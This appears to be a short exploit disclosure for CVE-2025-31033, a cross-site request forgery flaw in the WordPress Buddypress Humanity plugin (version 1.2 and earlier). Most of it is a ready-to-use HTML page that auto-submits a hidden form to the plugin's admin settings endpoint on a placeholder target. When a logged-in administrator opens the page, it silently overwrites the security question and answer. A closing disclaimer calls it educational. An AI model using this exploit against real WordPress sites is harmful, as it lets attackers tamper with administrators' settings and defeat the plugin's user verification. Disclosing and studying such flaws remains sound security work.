
WordPress Buddypress Humanity Plugin <= 1.2 is vulnerable to Cross Site Request Forgery (CSRF)
The Buddypress Humanity plugin for WordPress (version <= 1.2) is vulnerable to Cross-Site Request Forgery (CSRF).
This vulnerability allows an attacker to force a higher privileged user (e.g., admin) to unknowingly modify plugin settings (such as the security question and answer), bypassing user verification logic.
bph-settings page (admin only)CVE-2025-31033If exploited successfully, this vulnerability allows attackers to:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ Once this page is opened by an authenticated admin, it silently modifies the plugin settings.
This proof of concept is for educational purposes only.
Use responsibly and do not test on systems you do not own.
The author is not responsible for any misuse or damage caused.
Nxploited | Khaled Alenazi